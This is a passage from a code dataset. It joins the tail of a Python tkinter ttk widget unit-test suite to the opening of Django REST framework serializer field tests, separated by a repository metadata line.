conv(cbtn.tk.globalgetvar(cbtn['variable'])))
self.assertTrue(success)
cbtn2['command'] = ''
res = cbtn2.invoke()
self.assertEqual(str(res), '')
self.assertLessEqual(len(success), 1)
self.assertEqual(conv(cbtn2['value']), myvar.get())
self.assertEqual(myvar.get(),
conv(cbtn.tk.globalgetvar(cbtn['variable'])))
self.assertEqual(str(cbtn['variable']), str(cbtn2['variable']))
class MenubuttonTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'class', 'compound', 'cursor', 'direction',
'image', 'menu', 'state', 'style',
'takefocus', 'text', 'textvariable',
'underline', 'width',
)
def create(self, **kwargs):
return ttk.Menubutton(self.root, **kwargs)
def test_direction(self):
widget = self.create()
self.checkEnumParam(widget, 'direction',
'above', 'below', 'left', 'right', 'flush')
def test_menu(self):
widget = self.create()
menu = tkinter.Menu(widget, name='menu')
self.checkParam(widget, 'menu', menu, conv=str)
menu.destroy()
@add_standard_options(StandardTtkOptionsTests)
class ScaleTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'cursor', 'from', 'length',
'orient', 'style', 'takefocus', 'to', 'value', 'variable',
)
_conv_pixels = noconv_meth
default_orient = 'horizontal'
def setUp(self):
super(ScaleTest, self).setUp()
self.scale = self.create()
self.scale.pack()
self.scale.update()
def create(self, **kwargs):
return ttk.Scale(self.root, **kwargs)
def test_from(self):
widget = self.create()
self.checkFloatParam(widget, 'from', 100, 14.9, 15.1, conv=False)
def test_length(self):
widget = self.create()
self.checkPixelsParam(widget, 'length', 130, 131.2, 135.6, '5i')
def test_to(self):
widget = self.create()
self.checkFloatParam(widget, 'to', 300, 14.9, 15.1, -10, conv=False)
def test_value(self):
widget = self.create()
self.checkFloatParam(widget, 'value', 300, 14.9, 15.1, -10, conv=False)
def test_custom_event(self):
failure = [1, 1, 1] # will need to be empty
funcid = self.scale.bind('<<RangeChanged>>', lambda evt: failure.pop())
self.scale['from'] = 10
self.scale['from_'] = 10
self.scale['to'] = 3
self.assertFalse(failure)
failure = [1, 1, 1]
self.scale.configure(from_=2, to=5)
self.scale.configure(from_=0, to=-2)
self.scale.configure(to=10)
self.assertFalse(failure)
def test_get(self):
if self.wantobjects:
conv = lambda x: x
else:
conv = float
scale_width = self.scale.winfo_width()
self.assertEqual(self.scale.get(scale_width, 0), self.scale['to'])
self.assertEqual(conv(self.scale.get(0, 0)), conv(self.scale['from']))
self.assertEqual(self.scale.get(), self.scale['value'])
self.scale['value'] = 30
self.assertEqual(self.scale.get(), self.scale['value'])
self.assertRaises(tkinter.TclError, self.scale.get, '', 0)
self.assertRaises(tkinter.TclError, self.scale.get, 0, '')
def test_set(self):
if self.wantobjects:
conv = lambda x: x
else:
conv = float
# set restricts the max/min values according to the current range
max = conv(self.scale['to'])
new_max = max + 10
self.scale.set(new_max)
self.assertEqual(conv(self.scale.get()), max)
min = conv(self.scale['from'])
self.scale.set(min - 1)
self.assertEqual(conv(self.scale.get()), min)
# changing directly the variable doesn't impose this limitation tho
var = tkinter.DoubleVar(self.root)
self.scale['variable'] = var
var.set(max + 5)
self.assertEqual(conv(self.scale.get()), var.get())
self.assertEqual(conv(self.scale.get()), max + 5)
del var
# the same happens with the value option
self.scale['value'] = max + 10
self.assertEqual(conv(self.scale.get()), max + 10)
self.assertEqual(conv(self.scale.get()), conv(self.scale['value']))
# nevertheless, note that the max/min values we can get specifying
# x, y coords are the ones according to the current range
self.assertEqual(conv(self.scale.get(0, 0)), min)
self.assertEqual(conv(self.scale.get(self.scale.winfo_width(), 0)), max)
self.assertRaises(tkinter.TclError, self.scale.set, None)
@add_standard_options(StandardTtkOptionsTests)
class ProgressbarTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'orient', 'length',
'mode', 'maximum', 'phase',
'style', 'takefocus', 'value', 'variable',
)
_conv_pixels = noconv_meth
default_orient = 'horizontal'
def create(self, **kwargs):
return ttk.Progressbar(self.root, **kwargs)
def test_length(self):
widget = self.create()
self.checkPixelsParam(widget, 'length', 100.1, 56.7, '2i')
def test_maximum(self):
widget = self.create()
self.checkFloatParam(widget, 'maximum', 150.2, 77.7, 0, -10, conv=False)
def test_mode(self):
widget = self.create()
self.checkEnumParam(widget, 'mode', 'determinate', 'indeterminate')
def test_phase(self):
# XXX
pass
def test_value(self):
widget = self.create()
self.checkFloatParam(widget, 'value', 150.2, 77.7, 0, -10,
conv=False)
@unittest.skipIf(sys.platform == 'darwin',
'ttk.Scrollbar is special on MacOSX')
@add_standard_options(StandardTtkOptionsTests)
class ScrollbarTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'cursor', 'orient', 'style', 'takefocus',
)
default_orient = 'vertical'
def create(self, **kwargs):
return ttk.Scrollbar(self.root, **kwargs)
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class NotebookTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'height', 'padding', 'style', 'takefocus',
)
def setUp(self):
super(NotebookTest, self).setUp()
self.nb = self.create(padding=0)
self.child1 = ttk.Label(self.root)
self.child2 = ttk.Label(self.root)
self.nb.add(self.child1, text='a')
self.nb.add(self.child2, text='b')
def create(self, **kwargs):
return ttk.Notebook(self.root, **kwargs)
def test_tab_identifiers(self):
self.nb.forget(0)
self.nb.hide(self.child2)
self.assertRaises(tkinter.TclError, self.nb.tab, self.child1)
self.assertEqual(self.nb.index('end'), 1)
self.nb.add(self.child2)
self.assertEqual(self.nb.index('end'), 1)
self.nb.select(self.child2)
self.assertTrue(self.nb.tab('current'))
self.nb.add(self.child1, text='a')
self.nb.pack()
self.nb.wait_visibility()
if sys.platform == 'darwin':
tb_idx = "@20,5"
else:
tb_idx = "@5,5"
self.assertEqual(self.nb.tab(tb_idx), self.nb.tab('current'))
for i in range(5, 100, 5):
try:
if self.nb.tab('@%d, 5' % i, text=None) == 'a':
break
except tkinter.TclError:
pass
else:
self.fail("Tab with text 'a' not found")
def test_add_and_hidden(self):
self.assertRaises(tkinter.TclError, self.nb.hide, -1)
self.assertRaises(tkinter.TclError, self.nb.hide, 'hi')
self.assertRaises(tkinter.TclError, self.nb.hide, None)
self.assertRaises(tkinter.TclError, self.nb.add, None)
self.assertRaises(tkinter.TclError, self.nb.add, ttk.Label(self.root),
unknown='option')
tabs = self.nb.tabs()
self.nb.hide(self.child1)
self.nb.add(self.child1)
self.assertEqual(self.nb.tabs(), tabs)
child = ttk.Label(self.root)
self.nb.add(child, text='c')
tabs = self.nb.tabs()
curr = self.nb.index('current')
# verify that the tab gets readded at its previous position
child2_index = self.nb.index(self.child2)
self.nb.hide(self.child2)
self.nb.add(self.child2)
self.assertEqual(self.nb.tabs(), tabs)
self.assertEqual(self.nb.index(self.child2), child2_index)
self.assertEqual(str(self.child2), self.nb.tabs()[child2_index])
# but the tab next to it (not hidden) is the one selected now
self.assertEqual(self.nb.index('current'), curr + 1)
def test_forget(self):
self.assertRaises(tkinter.TclError, self.nb.forget, -1)
self.assertRaises(tkinter.TclError, self.nb.forget, 'hi')
self.assertRaises(tkinter.TclError, self.nb.forget, None)
tabs = self.nb.tabs()
child1_index = self.nb.index(self.child1)
self.nb.forget(self.child1)
self.assertNotIn(str(self.child1), self.nb.tabs())
self.assertEqual(len(tabs) - 1, len(self.nb.tabs()))
self.nb.add(self.child1)
self.assertEqual(self.nb.index(self.child1), 1)
self.assertNotEqual(child1_index, self.nb.index(self.child1))
def test_index(self):
self.assertRaises(tkinter.TclError, self.nb.index, -1)
self.assertRaises(tkinter.TclError, self.nb.index, None)
self.assertIsInstance(self.nb.index('end'), int)
self.assertEqual(self.nb.index(self.child1), 0)
self.assertEqual(self.nb.index(self.child2), 1)
self.assertEqual(self.nb.index('end'), 2)
def test_insert(self):
# moving tabs
tabs = self.nb.tabs()
self.nb.insert(1, tabs[0])
self.assertEqual(self.nb.tabs(), (tabs[1], tabs[0]))
self.nb.insert(self.child1, self.child2)
self.assertEqual(self.nb.tabs(), tabs)
self.nb.insert('end', self.child1)
self.assertEqual(self.nb.tabs(), (tabs[1], tabs[0]))
self.nb.insert('end', 0)
self.assertEqual(self.nb.tabs(), tabs)
# bad moves
self.assertRaises(tkinter.TclError, self.nb.insert, 2, tabs[0])
self.assertRaises(tkinter.TclError, self.nb.insert, -1, tabs[0])
# new tab
child3 = ttk.Label(self.root)
self.nb.insert(1, child3)
self.assertEqual(self.nb.tabs(), (tabs[0], str(child3), tabs[1]))
self.nb.forget(child3)
self.assertEqual(self.nb.tabs(), tabs)
self.nb.insert(self.child1, child3)
self.assertEqual(self.nb.tabs(), (str(child3), ) + tabs)
self.nb.forget(child3)
self.assertRaises(tkinter.TclError, self.nb.insert, 2, child3)
self.assertRaises(tkinter.TclError, self.nb.insert, -1, child3)
# bad inserts
self.assertRaises(tkinter.TclError, self.nb.insert, 'end', None)
self.assertRaises(tkinter.TclError, self.nb.insert, None, 0)
self.assertRaises(tkinter.TclError, self.nb.insert, None, None)
def test_select(self):
self.nb.pack()
self.nb.wait_visibility()
success = []
tab_changed = []
self.child1.bind('<Unmap>', lambda evt: success.append(True))
self.nb.bind('<<NotebookTabChanged>>',
lambda evt: tab_changed.append(True))
self.assertEqual(self.nb.select(), str(self.child1))
self.nb.select(self.child2)
self.assertTrue(success)
self.assertEqual(self.nb.select(), str(self.child2))
self.nb.update()
self.assertTrue(tab_changed)
def test_tab(self):
self.assertRaises(tkinter.TclError, self.nb.tab, -1)
self.assertRaises(tkinter.TclError, self.nb.tab, 'notab')
self.assertRaises(tkinter.TclError, self.nb.tab, None)
self.assertIsInstance(self.nb.tab(self.child1), dict)
self.assertEqual(self.nb.tab(self.child1, text=None), 'a')
# newer form for querying a single option
self.assertEqual(self.nb.tab(self.child1, 'text'), 'a')
self.nb.tab(self.child1, text='abc')
self.assertEqual(self.nb.tab(self.child1, text=None), 'abc')
self.assertEqual(self.nb.tab(self.child1, 'text'), 'abc')
def test_tabs(self):
self.assertEqual(len(self.nb.tabs()), 2)
self.nb.forget(self.child1)
self.nb.forget(self.child2)
self.assertEqual(self.nb.tabs(), ())
def test_traversal(self):
self.nb.pack()
self.nb.wait_visibility()
self.nb.select(0)
simulate_mouse_click(self.nb, 5, 5)
self.nb.focus_force()
self.nb.event_generate('<Control-Tab>')
self.assertEqual(self.nb.select(), str(self.child2))
self.nb.focus_force()
self.nb.event_generate('<Shift-Control-Tab>')
self.assertEqual(self.nb.select(), str(self.child1))
self.nb.focus_force()
self.nb.event_generate('<Shift-Control-Tab>')
self.assertEqual(self.nb.select(), str(self.child2))
self.nb.tab(self.child1, text='a', underline=0)
self.nb.enable_traversal()
self.nb.focus_force()
simulate_mouse_click(self.nb, 5, 5)
if sys.platform == 'darwin':
self.nb.event_generate('<Option-a>')
else:
self.nb.event_generate('<Alt-a>')
self.assertEqual(self.nb.select(), str(self.child1))
@add_standard_options(StandardTtkOptionsTests)
class TreeviewTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'columns', 'cursor', 'displaycolumns',
'height', 'padding', 'selectmode', 'show',
'style', 'takefocus', 'xscrollcommand', 'yscrollcommand',
)
def setUp(self):
super(TreeviewTest, self).setUp()
self.tv = self.create(padding=0)
def create(self, **kwargs):
return ttk.Treeview(self.root, **kwargs)
def test_columns(self):
widget = self.create()
self.checkParam(widget, 'columns', 'a b c',
expected=('a', 'b', 'c'))
self.checkParam(widget, 'columns', ('a', 'b', 'c'))
self.checkParam(widget, 'columns', () if tcl_version < (8, 5) else '')
def test_displaycolumns(self):
widget = self.create()
widget['columns'] = ('a', 'b', 'c')
self.checkParam(widget, 'displaycolumns', 'b a c',
expected=('b', 'a', 'c'))
self.checkParam(widget, 'displaycolumns', ('b', 'a', 'c'))
self.checkParam(widget, 'displaycolumns', '#all',
expected=('#all',))
self.checkParam(widget, 'displaycolumns', (2, 1, 0))
self.checkInvalidParam(widget, 'displaycolumns', ('a', 'b', 'd'),
errmsg='Invalid column index d')
self.checkInvalidParam(widget, 'displaycolumns', (1, 2, 3),
errmsg='Column index 3 out of bounds')
self.checkInvalidParam(widget, 'displaycolumns', (1, -2),
errmsg='Column index -2 out of bounds')
def test_height(self):
widget = self.create()
self.checkPixelsParam(widget, 'height', 100, -100, 0, '3c', conv=False)
self.checkPixelsParam(widget, 'height', 101.2, 102.6, conv=noconv)
def test_selectmode(self):
widget = self.create()
self.checkEnumParam(widget, 'selectmode',
'none', 'browse', 'extended')
def test_show(self):
widget = self.create()
self.checkParam(widget, 'show', 'tree headings',
expected=('tree', 'headings'))
self.checkParam(widget, 'show', ('tree', 'headings'))
self.checkParam(widget, 'show', ('headings', 'tree'))
self.checkParam(widget, 'show', 'tree', expected=('tree',))
self.checkParam(widget, 'show', 'headings', expected=('headings',))
def test_bbox(self):
self.tv.pack()
self.assertEqual(self.tv.bbox(''), '')
self.tv.wait_visibility()
self.tv.update()
item_id = self.tv.insert('', 'end')
children = self.tv.get_children()
self.assertTrue(children)
bbox = self.tv.bbox(children[0])
self.assertIsBoundingBox(bbox)
# compare width in bboxes
self.tv['columns'] = ['test']
self.tv.column('test', width=50)
bbox_column0 = self.tv.bbox(children[0], 0)
root_width = self.tv.column('#0', width=None)
if not self.wantobjects:
root_width = int(root_width)
self.assertEqual(bbox_column0[0], bbox[0] + root_width)
# verify that bbox of a closed item is the empty string
child1 = self.tv.insert(item_id, 'end')
self.assertEqual(self.tv.bbox(child1), '')
def test_children(self):
# no children yet, should get an empty tuple
self.assertEqual(self.tv.get_children(), ())
item_id = self.tv.insert('', 'end')
self.assertIsInstance(self.tv.get_children(), tuple)
self.assertEqual(self.tv.get_children()[0], item_id)
# add item_id and child3 as children of child2
child2 = self.tv.insert('', 'end')
child3 = self.tv.insert('', 'end')
self.tv.set_children(child2, item_id, child3)
self.assertEqual(self.tv.get_children(child2), (item_id, child3))
# child3 has child2 as parent, thus trying to set child2 as a children
# of child3 should result in an error
self.assertRaises(tkinter.TclError,
self.tv.set_children, child3, child2)
# remove child2 children
self.tv.set_children(child2)
self.assertEqual(self.tv.get_children(child2), ())
# remove root's children
self.tv.set_children('')
self.assertEqual(self.tv.get_children(), ())
def test_column(self):
# return a dict with all options/values
self.assertIsInstance(self.tv.column('#0'), dict)
# return a single value of the given option
if self.wantobjects:
self.assertIsInstance(self.tv.column('#0', width=None), int)
# set a new value for an option
self.tv.column('#0', width=10)
# testing new way to get option value
self.assertEqual(self.tv.column('#0', 'width'),
10 if self.wantobjects else '10')
self.assertEqual(self.tv.column('#0', width=None),
10 if self.wantobjects else '10')
# check read-only option
self.assertRaises(tkinter.TclError, self.tv.column, '#0', id='X')
self.assertRaises(tkinter.TclError, self.tv.column, 'invalid')
invalid_kws = [
{'unknown_option': 'some value'}, {'stretch': 'wrong'},
{'anchor': 'wrong'}, {'width': 'wrong'}, {'minwidth': 'wrong'}
]
for kw in invalid_kws:
self.assertRaises(tkinter.TclError, self.tv.column, '#0',
**kw)
def test_delete(self):
self.assertRaises(tkinter.TclError, self.tv.delete, '#0')
item_id = self.tv.insert('', 'end')
item2 = self.tv.insert(item_id, 'end')
self.assertEqual(self.tv.get_children(), (item_id, ))
self.assertEqual(self.tv.get_children(item_id), (item2, ))
self.tv.delete(item_id)
self.assertFalse(self.tv.get_children())
# reattach should fail
self.assertRaises(tkinter.TclError,
self.tv.reattach, item_id, '', 'end')
# test multiple item delete
item1 = self.tv.insert('', 'end')
item2 = self.tv.insert('', 'end')
self.assertEqual(self.tv.get_children(), (item1, item2))
self.tv.delete(item1, item2)
self.assertFalse(self.tv.get_children())
def test_detach_reattach(self):
item_id = self.tv.insert('', 'end')
item2 = self.tv.insert(item_id, 'end')
# calling detach without items is valid, although it does nothing
prev = self.tv.get_children()
self.tv.detach() # this should do nothing
self.assertEqual(prev, self.tv.get_children())
self.assertEqual(self.tv.get_children(), (item_id, ))
self.assertEqual(self.tv.get_children(item_id), (item2, ))
# detach item with children
self.tv.detach(item_id)
self.assertFalse(self.tv.get_children())
# reattach item with children
self.tv.reattach(item_id, '', 'end')
self.assertEqual(self.tv.get_children(), (item_id, ))
self.assertEqual(self.tv.get_children(item_id), (item2, ))
# move a children to the root
self.tv.move(item2, '', 'end')
self.assertEqual(self.tv.get_children(), (item_id, item2))
self.assertEqual(self.tv.get_children(item_id), ())
# bad values
self.assertRaises(tkinter.TclError,
self.tv.reattach, 'nonexistent', '', 'end')
self.assertRaises(tkinter.TclError,
self.tv.detach, 'nonexistent')
self.assertRaises(tkinter.TclError,
self.tv.reattach, item2, 'otherparent', 'end')
self.assertRaises(tkinter.TclError,
self.tv.reattach, item2, '', 'invalid')
# multiple detach
self.tv.detach(item_id, item2)
self.assertEqual(self.tv.get_children(), ())
self.assertEqual(self.tv.get_children(item_id), ())
def test_exists(self):
self.assertEqual(self.tv.exists('something'), False)
self.assertEqual(self.tv.exists(''), True)
self.assertEqual(self.tv.exists({}), False)
# the following will make a tk.call equivalent to
# tk.call(treeview, "exists") which should result in an error
# in the tcl interpreter since tk requires an item.
self.assertRaises(tkinter.TclError, self.tv.exists, None)
def test_focus(self):
# nothing is focused right now
self.assertEqual(self.tv.focus(), '')
item1 = self.tv.insert('', 'end')
self.tv.focus(item1)
self.assertEqual(self.tv.focus(), item1)
self.tv.delete(item1)
self.assertEqual(self.tv.focus(), '')
# try focusing inexistent item
self.assertRaises(tkinter.TclError, self.tv.focus, 'hi')
def test_heading(self):
# check a dict is returned
self.assertIsInstance(self.tv.heading('#0'), dict)
# check a value is returned
self.tv.heading('#0', text='hi')
self.assertEqual(self.tv.heading('#0', 'text'), 'hi')
self.assertEqual(self.tv.heading('#0', text=None), 'hi')
# invalid option
self.assertRaises(tkinter.TclError, self.tv.heading, '#0',
background=None)
# invalid value
self.assertRaises(tkinter.TclError, self.tv.heading, '#0',
anchor=1)
def test_heading_callback(self):
def simulate_heading_click(x, y):
simulate_mouse_click(self.tv, x, y)
self.tv.update()
success = [] # no success for now
self.tv.pack()
self.tv.wait_visibility()
self.tv.heading('#0', command=lambda: success.append(True))
self.tv.column('#0', width=100)
self.tv.update()
# assuming that the coords (5, 5) fall into heading #0
simulate_heading_click(5, 5)
if not success:
self.fail("The command associated to the treeview heading wasn't "
"invoked.")
success = []
commands = self.tv.master._tclCommands
self.tv.heading('#0', command=str(self.tv.heading('#0', command=None)))
self.assertEqual(commands, self.tv.master._tclCommands)
simulate_heading_click(5, 5)
if not success:
self.fail("The command associated to the treeview heading wasn't "
"invoked.")
# XXX The following raises an error in a tcl interpreter, but not in
# Python
#self.tv.heading('#0', command='I dont exist')
#simulate_heading_click(5, 5)
def test_index(self):
# item 'what' doesn't exist
self.assertRaises(tkinter.TclError, self.tv.index, 'what')
self.assertEqual(self.tv.index(''), 0)
item1 = self.tv.insert('', 'end')
item2 = self.tv.insert('', 'end')
c1 = self.tv.insert(item1, 'end')
c2 = self.tv.insert(item1, 'end')
self.assertEqual(self.tv.index(item1), 0)
self.assertEqual(self.tv.index(c1), 0)
self.assertEqual(self.tv.index(c2), 1)
self.assertEqual(self.tv.index(item2), 1)
self.tv.move(item2, '', 0)
self.assertEqual(self.tv.index(item2), 0)
self.assertEqual(self.tv.index(item1), 1)
# check that index still works even after its parent and siblings
# have been detached
self.tv.detach(item1)
self.assertEqual(self.tv.index(c2), 1)
self.tv.detach(c1)
self.assertEqual(self.tv.index(c2), 0)
# but it fails after item has been deleted
self.tv.delete(item1)
self.assertRaises(tkinter.TclError, self.tv.index, c2)
def test_insert_item(self):
# parent 'none' doesn't exist
self.assertRaises(tkinter.TclError, self.tv.insert, 'none', 'end')
# open values
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
open='')
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
open='please')
self.assertFalse(self.tv.delete(self.tv.insert('', 'end', open=True)))
self.assertFalse(self.tv.delete(self.tv.insert('', 'end', open=False)))
# invalid index
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'middle')
# trying to duplicate item id is invalid
itemid = self.tv.insert('', 'end', 'first-item')
self.assertEqual(itemid, 'first-item')
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
'first-item')
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
MockTclObj('first-item'))
# unicode values
value = u'\xe1ba'
item = self.tv.insert('', 'end', values=(value, ))
self.assertEqual(self.tv.item(item, 'values'),
(value,) if self.wantobjects else value)
self.assertEqual(self.tv.item(item, values=None),
(value,) if self.wantobjects else value)
self.tv.item(item, values=self.root.splitlist(self.tv.item(item, values=None)))
self.assertEqual(self.tv.item(item, values=None),
(value,) if self.wantobjects else value)
self.assertIsInstance(self.tv.item(item), dict)
# erase item values
self.tv.item(item, values='')
self.assertFalse(self.tv.item(item, values=None))
# item tags
item = self.tv.insert('', 'end', tags=[1, 2, value])
self.assertEqual(self.tv.item(item, tags=None),
('1', '2', value) if self.wantobjects else
'1 2 %s' % value)
self.tv.item(item, tags=[])
self.assertFalse(self.tv.item(item, tags=None))
self.tv.item(item, tags=(1, 2))
self.assertEqual(self.tv.item(item, tags=None),
('1', '2') if self.wantobjects else '1 2')
# values with spaces
item = self.tv.insert('', 'end', values=('a b c',
'%s %s' % (value, value)))
self.assertEqual(self.tv.item(item, values=None),
('a b c', '%s %s' % (value, value)) if self.wantobjects else
'{a b c} {%s %s}' % (value, value))
# text
self.assertEqual(self.tv.item(
self.tv.insert('', 'end', text="Label here"), text=None),
"Label here")
self.assertEqual(self.tv.item(
self.tv.insert('', 'end', text=value), text=None),
value)
def test_set(self):
self.tv['columns'] = ['A', 'B']
item = self.tv.insert('', 'end', values=['a', 'b'])
self.assertEqual(self.tv.set(item), {'A': 'a', 'B': 'b'})
self.tv.set(item, 'B', 'a')
self.assertEqual(self.tv.item(item, values=None),
('a', 'a') if self.wantobjects else 'a a')
self.tv['columns'] = ['B']
self.assertEqual(self.tv.set(item), {'B': 'a'})
self.tv.set(item, 'B', 'b')
self.assertEqual(self.tv.set(item, column='B'), 'b')
self.assertEqual(self.tv.item(item, values=None),
('b', 'a') if self.wantobjects else 'b a')
self.tv.set(item, 'B', 123)
self.assertEqual(self.tv.set(item, 'B'),
123 if self.wantobjects else '123')
self.assertEqual(self.tv.item(item, values=None),
(123, 'a') if self.wantobjects else '123 a')
self.assertEqual(self.tv.set(item),
{'B': 123} if self.wantobjects else {'B': '123'})
# inexistent column
self.assertRaises(tkinter.TclError, self.tv.set, item, 'A')
self.assertRaises(tkinter.TclError, self.tv.set, item, 'A', 'b')
# inexistent item
self.assertRaises(tkinter.TclError, self.tv.set, 'notme')
def test_tag_bind(self):
events = []
item1 = self.tv.insert('', 'end', tags=['call'])
item2 = self.tv.insert('', 'end', tags=['call'])
self.tv.tag_bind('call', '<ButtonPress-1>',
lambda evt: events.append(1))
self.tv.tag_bind('call', '<ButtonRelease-1>',
lambda evt: events.append(2))
self.tv.pack()
self.tv.wait_visibility()
self.tv.update()
pos_y = set()
found = set()
for i in range(0, 100, 10):
if len(found) == 2: # item1 and item2 already found
break
item_id = self.tv.identify_row(i)
if item_id and item_id not in found:
pos_y.add(i)
found.add(item_id)
self.assertEqual(len(pos_y), 2) # item1 and item2 y pos
for y in pos_y:
simulate_mouse_click(self.tv, 0, y)
# by now there should be 4 things in the events list, since each
# item had a bind for two events that were simulated above
self.assertEqual(len(events), 4)
for evt in zip(events[::2], events[1::2]):
self.assertEqual(evt, (1, 2))
def test_tag_configure(self):
# Just testing parameter passing for now
self.assertRaises(TypeError, self.tv.tag_configure)
self.assertRaises(tkinter.TclError, self.tv.tag_configure,
'test', sky='blue')
self.tv.tag_configure('test', foreground='blue')
self.assertEqual(str(self.tv.tag_configure('test', 'foreground')),
'blue')
self.assertEqual(str(self.tv.tag_configure('test', foreground=None)),
'blue')
self.assertIsInstance(self.tv.tag_configure('test'), dict)
def test_tag_has(self):
item1 = self.tv.insert('', 'end', text='Item 1', tags=['tag1'])
item2 = self.tv.insert('', 'end', text='Item 2', tags=['tag2'])
self.assertRaises(TypeError, self.tv.tag_has)
self.assertRaises(TclError, self.tv.tag_has, 'tag1', 'non-existing')
self.assertTrue(self.tv.tag_has('tag1', item1))
self.assertFalse(self.tv.tag_has('tag1', item2))
self.assertFalse(self.tv.tag_has('tag2', item1))
self.assertTrue(self.tv.tag_has('tag2', item2))
self.assertFalse(self.tv.tag_has('tag3', item1))
self.assertFalse(self.tv.tag_has('tag3', item2))
self.assertEqual(self.tv.tag_has('tag1'), (item1,))
self.assertEqual(self.tv.tag_has('tag2'), (item2,))
self.assertEqual(self.tv.tag_has('tag3'), ())
@add_standard_options(StandardTtkOptionsTests)
class SeparatorTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'orient', 'style', 'takefocus',
# 'state'?
)
default_orient = 'horizontal'
def create(self, **kwargs):
return ttk.Separator(self.root, **kwargs)
@add_standard_options(StandardTtkOptionsTests)
class SizegripTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'style', 'takefocus',
# 'state'?
)
def create(self, **kwargs):
return ttk.Sizegrip(self.root, **kwargs)
tests_gui = (
ButtonTest, CheckbuttonTest, ComboboxTest, EntryTest,
FrameTest, LabelFrameTest, LabelTest, MenubuttonTest,
NotebookTest, PanedWindowTest, ProgressbarTest,
RadiobuttonTest, ScaleTest, ScrollbarTest, SeparatorTest,
SizegripTest, TreeviewTest, WidgetTest,
)
if __name__ == "__main__":
run_unittest(*tests_gui)
| gpl-3.0 |
hsfzxjy/wisecitymbc | site_packages/rest_framework/tests/test_fields.py | 2 | 36085 | """
General serializer field tests.
"""
from __future__ import unicode_literals
import datetime
from decimal import Decimal
from uuid import uuid4
from django.core import validators
from django.db import models
from django.test import TestCase
from django.utils.datastructures import SortedDict
from rest_framework import serializers
from rest_framework.tests.models import RESTFrameworkModel
class TimestampedModel(models.Model):
added = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class CharPrimaryKeyModel(models.Model):
id = models.CharField(max_length=20, primary_key=True)
class TimestampedModelSerializer(serializers.ModelSerializer):
class Meta:
model = TimestampedModel
class CharPrimaryKeyModelSerializer(serializers.ModelSerializer):
class Meta:
model = CharPrimaryKeyModel
class TimeFieldModel(models.Model):
clock = models.TimeField()
class TimeFieldModelSerializer(serializers.ModelSerializer):
class Meta:
model = TimeFieldModel
SAMPLE_CHOICES = [
('red', 'Red'),
('green', 'Green'),
('blue', 'Blue'),
]
class ChoiceFieldModel(models.Model):
choice = models.CharField(choices=SAMPLE_CHOICES, blank=True, max_length=255)
class ChoiceFieldModelSerializer(serializers.ModelSerializer):
class Meta:
model = ChoiceFieldModel
class ChoiceFieldModelWithNull(models.Model):
choice = models.CharField(choices=SAMPLE_CHOICES, blank=True, null=True, max_length=255)
class ChoiceFieldModelWithNullSerializer(serializers.ModelSerializer):
class Meta:
model = ChoiceFieldModelWithNull
class BasicFieldTests(TestCase):
def test_auto_now_fields_read_only(self):
"""
auto_now and auto_now_add fields should be read_only by default.
"""
serializer = TimestampedModelSerializer()
self.assertEqual(serializer.fields['added'].read_only, True)
def test_auto_pk_fields_read_only(self):
"""
AutoField fields should be read_only by default.
"""
serializer = TimestampedModelSerializer()
self.assertEqual(serializer.fields['id'].read_only, True)
def test_non_auto_pk_fields_not_read_only(self):
"""
PK fields other than AutoField fields should not be read_only by default.
"""
serializer = CharPrimaryKeyModelSerializer()
self.assertEqual(serializer.fields['id'].read_only, False)
def test_dict_field_ordering(self):
"""
Field should preserve dictionary ordering, if it exists.
See: https://github.com/tomchristie/django-rest-framework/issues/832
"""
ret = SortedDict()
ret['c'] = 1
ret['b'] = 1
ret['a'] = 1
ret['z'] = 1
field = serializers.Field()
keys = list(field.to_native(ret).keys())
self.assertEqual(keys, ['c', 'b', 'a', 'z'])
class DateFieldTest(TestCase):
"""
Tests for the DateFieldTest from_native() and to_native() behavior
"""
def test_from_native_string(self):
"""
Make sure from_native() accepts default iso input formats.
"""
f = serializers.DateField()
result_1 = f.from_native('1984-07-31')
self.assertEqual(datetime.date(1984, 7, 31), result_1)
def test_from_native_datetime_date(self):
"""
Make sure from_native() accepts a datetime.date instance.
"""
f = serializers.DateField()
result_1 = f.from_native(datetime.date(1984, 7, 31))
self.assertEqual(result_1, datetime.date(1984, 7, 31))
def test_from_native_custom_format(self):
"""
Make sure from_native() accepts custom input formats.
"""
f = serializers.DateField(input_formats=['%Y -- %d'])
result = f.from_native('1984 -- 31')
self.assertEqual(datetime.date(1984, 1, 31), result)
def test_from_native_invalid_default_on_custom_format(self):
"""
Make sure from_native() don't accept default formats if custom format is preset
"""
f = serializers.DateField(input_formats=['%Y -- %d'])
try:
f.from_native('1984-07-31')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Date has wrong format. Use one of these formats instead: YYYY -- DD"])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_empty(self):
"""
Make sure from_native() returns None on empty param.
"""
f = serializers.DateField()
result = f.from_native('')
self.assertEqual(result, None)
def test_from_native_none(self):
"""
Make sure from_native() returns None on None param.
"""
f = serializers.DateField()
result = f.from_native(None)
self.assertEqual(result, None)
def test_from_native_invalid_date(self):
"""
Make sure from_native() raises a ValidationError on passing an invalid date.
"""
f = serializers.DateField()
try:
f.from_native('1984-13-31')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]]"])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_invalid_format(self):
"""
Make sure from_native() raises a ValidationError on passing an invalid format.
"""
f = serializers.DateField()
try:
f.from_native('1984 -- 31')
except validators.ValidationError as e:
